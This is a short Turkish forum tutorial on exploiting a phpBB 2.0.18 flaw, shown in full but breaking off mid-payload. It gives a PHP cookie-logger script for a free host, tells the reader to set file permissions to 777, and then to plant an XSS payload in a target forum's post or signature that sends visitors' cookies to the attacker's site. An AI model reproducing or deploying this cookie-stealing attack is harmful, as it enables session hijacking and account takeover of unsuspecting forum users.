phpBB 2.0.18 yönlendirme açığı

phpBB 2.0.18 yönlendirme açığı

--------------------------------------------------------------------------------

öncelikle php destekli Bir Host alıyoruz..

Google'a Girip Free Host Dedik Mi çıkan Sitelerden bir Php Destekli Host alıyoruz..

Şimdi Yeni Notepad Açıp

<?php
$cookie = $_GET[’c’];
$ip = getenv (’REMOTE_ADDR’);
$date=date("j F, Y, g:i a");
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’cookies.txt’, ’a’);
fwrite($fp, ’Cookie: ’.$cookie.’<br> IP: ’ .$ip. ’<br> Date and Time: ’ .$date. ’<br> Referer: ’.$referer.’<br><br><br>’);
fclose($fp);
?>

Farklı Kaydet Diyoruz..örneğin ismini cookies.php yapalım. Daha sonra ftp den bu dosyayı hostumuza atalım

Şimdi bir tane daha not defteri açın içine hiçbirşey yazmayın. Onu da php olarak kaydedelim ve ismini örneğin gelencookieler.php yapalım. Bunu da hostumuza atalım. Ama bu boş bıraktığımız gelencookilere.php dosyasına CHMOD ayarı vereceğiz. Sap tıklayıp CHMOD a gelelim ve 777 ye ayarlayalım yani "okuma" "yazma" ve "çalıştırma" izni vermiş olacaksınız.


Bunu da hallettikten sonra phpbb 2.0.18 kurulu hedef bi site bulalım. Forumlardan birine bi konu açalım veya imzanızada yazabilirsiniz.


Kod:
<pre a=’>’ onmouseover=’document.location="http://www.sizinsiteniz.com/cookies.php?c="+document